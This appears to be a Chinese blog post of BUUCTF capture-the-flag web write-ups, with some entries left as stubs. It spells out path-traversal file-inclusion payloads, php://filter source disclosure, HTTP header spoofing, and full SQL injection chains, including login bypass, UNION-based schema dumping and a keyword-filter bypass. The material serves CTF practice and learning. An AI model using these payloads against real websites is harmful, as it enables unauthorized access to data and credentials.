BUUCTF(持续更新)

1.Warmup

首先F12 发现source.php 访问发现源码

代码审计

首先!empty($_REQUEST['file'])作用为file参数不能为空   is_string($_REQUEST['file'])作用为file参数必须为字符串  接着调用checkFile函数判断是否满足条件,若是满足则include $_REQUEST[‘file’].                                                现在来看checkFile函数

checkFile函数

1.首先定义了一个白命单:$whitelist = ["source"=>"source.php","hint"=>"hint.php"]                                                  checkFile中的第一个if判断与前面提到的一样是判断字符串的                                                                             2.第二个if判断给了我们两个php文件,source.php是我们看到的源码,接着看hint.php

hint.php

所以我们可以用get方式?file=source.php或者hint.php                                                                                         3.接着$_page = mb_substr($page,0,mb_strpos($page . '?', '?')                                                                           这一段代码的意思是返回file参数第一个?之前的字符串 如果存在于白名单则返回true                                            在这里我们可以给出一个非预期题解(可以得到flag,但是不是出题人想考的点)                                               payload:                              ?file=hint.php?../../../../../ffffllllaaaagggg                                                                 4. 接着往下看 $_page = urldecode($page);此处是一个url解码                                                                             构造payload:                     ?file=source.php%253f../../../../../ffffllllaaaagggg                                                       因为url经过后端时候会自动进行一次解码 所以需要二次编码 ?的第一次URL编码是%3f 第二次URL编码是%253f可以得到flag.

flag!

2.[强网杯 2019]随便注 1

XCTF刷题笔记第五题,有时间再搬运过来

3.[极客大挑战 2019]EasySQL 1

最简单的注入,注入入门,直接给答题的图

万能钥匙

1' or 1=1# 密码随意 不懂的自己看sql注入详解

flag!


4.[极客大挑战 2019]Havefun

进去是个有爱的撸猫界面(!咳咳咳 进入正题                                                                                                   F12 发现注释

hint

get方式上传

payload
flag!


5.[SUCTF 2019]EasySQL 1

超出能力范围,日后再说

6.[极客大挑战 2019]Secret File

F12访问Archive_room.php                                                                                                                              接着点击secret,发现跳转到end界面

flag.php

凭借做题经验怀疑网页被重定向loacation到end界面                                                                                            用burpsuit抓包

bp抓包

发现secr3t.php 访问

源码

发现strstr函数、stristr函数所以tp、input、data、等字符被过滤了这些字符自然联想到php伪协议                          还有一个php://fileter                                                                                                                                         构造payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php                                                 发现base64编码 菜鸟工具解码

菜鸟工具

得到flag!

疑惑(求大佬解答)

7.[ACTF2020 新生赛]Include 1

和第六题考点类似 都是伪协议

过滤

再次尝试?file=php://data://text/plain 同样hacker!                                                                                             接着我们尝试?file=php://filter/read=convert.base64-encode/resource=flag.php

jiebase64

菜鸟工具解码

flag!

8.[极客大挑战 2019]LoveSQL 1

用户名:'    密码:1                                                                                                                                      

报错:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1'' at line 1.                                                                                                     推测是字符型注入

接着尝试一下                                                                                                                                               

用户名: 1' or 1=1#  密码:1

并无卵用

尝试各种解码 有卵用and无卵用!!                                                                                                                 尝试union注入                                                                                                                                                 1.利用orderby来推测出该数据表中的字段数量                     

1‘orderby 3#
1‘ orderby 4#

可以推测出字段数量为3                                                                                                                                    2.接着就是爆显                                                                                                                                                用户名:1' union select 1,2,3#            密码:1

爆出2,3

3.1' union select 1,database(),3#    得到数据库名为geek

geek!

4.查询表名称                                                                                                                                                    1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#

得到两个表名分别为geekuser,l0ve1ysq1

5.查询字段名称(由题目名称猜测flag所在的表应该为l0ve1ysq1)                                                                       1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

得到表里的字段名称

6.最后一步得到flag                                                                                                                                        payload:1' union select 1,2,group_concat(password) from l0ve1ysq1 #

flag!

15.[极客大挑战 2019]Http 1

查看页面源码,发现Secret.php文件

发现一个小秘密

访问Secret.php页面,给了提示 It doesn't come from 'https://www.Sycsecret.com'

hint1

果断想起来http响应头中的referer属性,burpsuit抓包,添加referer:https://www.Sycsecret.com,重新访问页面

hint2

browser是浏览器,再次在刚刚抓到的包更改user-agent属性 user-agent:Syclover

hint3

最后一步伪造ip地址X-Forwarded-For:127.0.0.1得到flag

flag撒花!

21.[极客大挑战 2019]BabySQL 1

这道题在LoveSQL的基础上增加了一个考点------SQL注入的双写绕过技巧                                                            简单介绍一下双写绕过注入                                                                                                                               例:我们在访问的网页中 输入                                                                           

万能钥匙

在上一题的网页中 我们应该是可以登录成功的(虽然得不到有用的信息)                                                              但是在这道题中 我们会得到一段报错:                                                                                                                You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1=1#' and password='123'' at line 1.                                                                              原理分析:网站做了一些过滤,从我们刚刚输入的用户名和报错提示,可以推断出关键字or是被过滤的,所以or 1=1#传入到数据库后变为1=1#                                                                                                                          绕过方法:双写 例如:or---> oorr  from--->frofromm and--->anandd

解题:方法同LoveSQL的注入方式                                                                                                                     1.union select 查询字段数 如下:                                                                                                                     1' uniounionn selecselectt 1,2,3#                                                                           

爆显

2.查数据库名称:1' uniounionn selecselectt 1,2,database()# 

geek数据库

3.查表名:1' uniounionn selecselectt 1,2,group_concat(table_name) frofromm infoorrmation_schema.tables wherwheree table_schema='geek'#

表名

4.查字段名:1' uniounionn selecselectt 1,2,group_concat(column_name) frofromm infoorrmation_schema.columns wherwheree table_name='b4bsql'#

 字段名

5.查flag:1' uniounionn selecselectt group_concat(passwoorrd) frofromm b4bsql#

flag!


23.[BJDCTF2020]Easy MD5 1

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,445评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,889评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,047评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,760评论 1 276
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,745评论 5 367
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,638评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,011评论 3 398
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,669评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,923评论 1 299
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,655评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,740评论 1 330
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,406评论 4 320
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,995评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,961评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,197评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,023评论 2 350
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,483评论 2 342

推荐阅读更多精彩内容

  • 知识点:代码审计,phpmyadmin任意文件包含漏洞参考:phpmyadmin 4.8.1任意文件包含涉及函数:...
    简言之_阅读 1,626评论 0 3
  • 0x01 [HCTF 2018]WarmUp f12看到提示进入source.php,看到代码 分析第一段代码,$...
    Du1in9阅读 1,121评论 0 1
  • [HCTF 2018]WarmUp 打开链接后是一张图片,看看源码提示source.php,进入source.ph...
    佛系小沈阅读 4,772评论 0 4
  • 1.baby_web 打开发现题目被定位到/1.php,根据提示改为index.php,发现还是1.php 打开网...
    xbx_0d阅读 900评论 0 3
  • 我使用的是火狐浏览器 使用火狐浏览器的hackbar插件 如果有错误的地方希望大家多多指出,多谢多谢 WEB2 点...
    yangc随想阅读 54,233评论 11 16